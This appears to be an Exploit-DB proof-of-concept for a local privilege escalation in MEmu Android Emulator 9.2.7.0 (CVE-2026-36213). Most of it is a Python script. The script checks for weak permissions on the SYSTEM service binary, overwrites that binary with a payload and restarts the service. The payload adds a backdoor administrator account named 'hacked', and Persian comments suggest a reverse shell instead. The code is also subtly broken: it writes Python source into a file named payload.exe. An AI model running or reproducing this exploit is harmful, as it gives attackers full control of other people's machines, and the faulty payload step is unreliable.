MEmu Android Emulator 9.2.7.0 - Local Privilege Escalation

EDB-ID:

52615


Author:

Mohammad

Type:

local


Platform:

Windows

Date:

2026-07-06


# Exploit Title: MEmu Android Emulator 9.2.7.0 - Local Privilege Escalation 
# Google Dork: N/A
# Date: 2026-06-16
# Exploit Author: Mohammad
# Vendor Homepage: https://www.memuplay.com
# Software Link: https://www.memuplay.com/download.html
# Version: 9.2.7.0
# Tested on: Windows 10 x64 / Windows 11 x64
# CVE: CVE-2026-36213

###############################################
# Vulnerability Description
###############################################
#
# MEmu Android Emulator 9.2.7.0 installs a Windows
# service named "MEmuSVC" that runs with
# NT AUTHORITY\SYSTEM (LocalSystem) privileges.
#
# The service binary located at:
#   C:\Program Files\Microvirt\MEmu\MemuService.exe
#
# is installed with insecure NTFS permissions,
# granting FullControl (F) to low-privileged groups:
#   - BUILTIN\Users
#   - Everyone
#
# A low-privileged local user can replace the service
# binary with a malicious executable.
# Upon service restart, the malicious binary executes
# with NT AUTHORITY\SYSTEM privileges.
#
# Vulnerability Type : Incorrect Access Control
# CWE                : CWE-732 (Incorrect Permission 
#                      Assignment for Critical Resource)
# CVSS v3.1 Score    : 7.8 HIGH
# CVSS Vector        : AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
#
###############################################
# Verification - Check Permissions
###############################################
#
# Run the following command to verify vulnerability:
#
#   icacls "C:\Program Files\Microvirt\MEmu\MemuService.exe"
#
# Vulnerable output:
#   C:\Program Files\Microvirt\MEmu\MemuService.exe
#   BUILTIN\Users:(F)
#   Everyone:(F)
#   NT AUTHORITY\SYSTEM:(F)
#   BUILTIN\Administrators:(F)
#
###############################################
# Proof of Concept
###############################################

import os
import sys
import shutil
import subprocess
import ctypes

# -----------------------------------------------
# Step 1: Check if running as low-privileged user
# -----------------------------------------------
def is_admin():
    try:
        return ctypes.windll.shell32.IsUserAnAdmin()
    except:
        return False

# -----------------------------------------------
# Step 2: Verify vulnerable permissions on binary
# -----------------------------------------------
def check_permissions(target_path):
    print("[*] Checking permissions on service binary...")
    print(f"[*] Target: {target_path}\n")
    
    result = subprocess.run(
        ["icacls", target_path],
        capture_output=True,
        text=True
    )
    
    output = result.stdout
    print(output)
    
    # Check for vulnerable permissions
    vulnerable = False
    dangerous_groups = ["BUILTIN\\Users", "Everyone"]
    
    for group in dangerous_groups:
        if group in output and "(F)" in output:
            print(f"[!] VULNERABLE: {group} has FullControl (F)")
            vulnerable = True
    
    return vulnerable

# -----------------------------------------------
# Step 3: Create malicious payload
#         (در محیط واقعی اینجا payload قرار میگیره)
# -----------------------------------------------
def create_payload(payload_path):
    print("\n[*] Creating malicious payload...")
    
    # این یه نمونه ساده‌ست
    # در محیط واقعی اینجا کد مخرب قرار میگیره
    # مثلاً reverse shell یا user creation
    payload_code = '''
import os
# Example: Add new admin user
os.system("net user hacked Password123! /add")
os.system("net localgroup administrators hacked /add")
print("[+] Payload executed as NT AUTHORITY\\SYSTEM")
'''
    
    # کامپایل یا آماده‌سازی payload
    with open(payload_path, "w") as f:
        f.write(payload_code)
    
    print(f"[+] Payload created at: {payload_path}")

# -----------------------------------------------
# Step 4: Replace legitimate binary with payload
# -----------------------------------------------
def replace_binary(target_path, payload_path):
    print("\n[*] Replacing service binary...")
    
    # Backup original binary
    backup_path = target_path + ".bak"
    
    try:
        shutil.copy2(target_path, backup_path)
        print(f"[+] Original backed up to: {backup_path}")
        
        shutil.copy2(payload_path, target_path)
        print(f"[+] Binary replaced successfully!")
        return True
        
    except PermissionError:
        print("[-] Permission denied - Not vulnerable")
        return False
    except Exception as e:
        print(f"[-] Error: {e}")
        return False

# -----------------------------------------------
# Step 5: Restart service to trigger execution
# -----------------------------------------------
def restart_service(service_name):
    print(f"\n[*] Restarting service: {service_name}")
    
    try:
        subprocess.run(
            ["sc", "stop", service_name],
            capture_output=True
        )
        print(f"[+] Service stopped")
        
        import time
        time.sleep(2)
        
        subprocess.run(
            ["sc", "start", service_name],
            capture_output=True
        )
        print(f"[+] Service started")
        print(f"[+] Payload should now execute as SYSTEM!")
        return True
        
    except Exception as e:
        print(f"[-] Error restarting service: {e}")
        return False

# -----------------------------------------------
# Main Exploit Flow
# -----------------------------------------------
def main():
    print("=" * 55)
    print(" CVE-2026-36213 - MEmu LPE PoC")
    print(" MEmu Android Emulator 9.2.7.0")
    print(" Researcher: Mohammad")
    print("=" * 55)
    
    # Config
    TARGET_SERVICE = "MEmuSVC"
    TARGET_BINARY  = (
        r"C:\Program Files\Microvirt\MEmu\MemuService.exe"
    )
    PAYLOAD_PATH   = r"C:\Temp\payload.exe"
    
    # Check not running as admin
    if is_admin():
        print("[!] Run this as a LOW-PRIVILEGED user!")
        print("[!] This PoC demonstrates LPE")
        sys.exit(1)
    
    print(f"[*] Running as: {os.getenv('USERNAME')}")
    print(f"[*] Admin    : {is_admin()} (should be False)\n")
    
    # Step 1: Verify vulnerability
    if not check_permissions(TARGET_BINARY):
        print("\n[-] Target does not appear vulnerable")
        print("[-] Permissions may have been fixed")
        sys.exit(0)
    
    print("\n[+] Target is VULNERABLE!")
    
    # Step 2: Create payload
    create_payload(PAYLOAD_PATH)
    
    # Step 3: Replace binary
    if not replace_binary(TARGET_BINARY, PAYLOAD_PATH):
        print("\n[-] Exploit failed at binary replacement")
        sys.exit(1)
    
    # Step 4: Trigger execution
    restart_service(TARGET_SERVICE)
    
    print("\n[+] Exploit completed!")
    print("[+] Check if payload executed successfully")
    print("=" * 55)

if __name__ == "__main__":
    main()

###############################################
# Detection Script
###############################################
#
# Automated detection tool available at:
# https://github.com/sec-zone/Hijack-service-binaries
#
###############################################
# Disclosure Timeline
###############################################
#
# 2026-02-20 → Vulnerability discovered
# 2026-02-20 → CVE-2026-36213 assigned by MITRE
# 2026-06-11 → Vendor (Microvirt) notified
# 2026-06-16 → Public disclosure
#
###############################################
# References
###############################################
#
# [1] CWE-732: Incorrect Permission Assignment
#     https://cwe.mitre.org/data/definitions/732.html
#
# [2] CVE-2026-36213
#     https://www.cve.org/CVERecord?id=CVE-2026-36213
#
# [3] Detection Script
#     https://github.com/sec-zone/Hijack-service-binaries
#
###############################################